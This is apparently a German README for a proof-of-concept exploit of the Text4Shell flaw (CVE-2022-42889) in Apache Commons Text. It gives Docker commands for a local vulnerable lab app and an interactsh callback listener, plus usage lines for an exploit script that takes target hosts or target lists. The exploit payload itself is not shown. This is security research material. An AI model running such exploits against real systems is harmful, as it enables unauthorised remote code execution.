
CVE-2022-42889 - Text4Shell Exploit
Dies ist ein Proof of Concept, der die Schwachstelle in Apache Commons Text [CVE-2022-42889] ausnutzt.
Verwundbare Versionen : 1.5.0 bis (ausschließlich) 1.10.0
Eine erfolgreiche Ausnutzung dieser Schwachstelle ermöglicht es einem nicht authentifizierten Angreifer, beliebigen Code auf dem verwundbaren System auszuführen.
Die von @securekomodo entwickelte Anwendung ist hier angehängt.
Diese Anwendung kann auch aus der Docker-Registry geladen werden
docker run -p 8080:8080 gokul2/text4shell-poc:latest
Die Anwendung ist nun unter localhost:8080 verfügbar.
Um die willkürliche Befehlsausführung zu überprüfen, verwenden wir interactsh, ein Tool zur Erfassung von OOB-Interaktionen von @projectdiscovery.
Richten Sie den Interactsh-Client ein, bevor Sie den eigentlichen Exploit ausführen.
docker run projectdiscovery/interactsh-client:latest
Notieren Sie sich die nach dem Start der Anwendung aufgeführte Domain
[INF] Listing 1 payload for OOB Testing
[INF] xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.pro
python3 exploit.py -u [host] -i [input-file-with-targets] -v [interactsh client domain] -p [proxy(optional)]
python3 exploit.py -u [host] -t [single target path] -v [interactsh client domain] -p [proxy(optional)]
Überprüfen Sie die Protokolle im Interactsh-Client, um den Exploit zu validieren.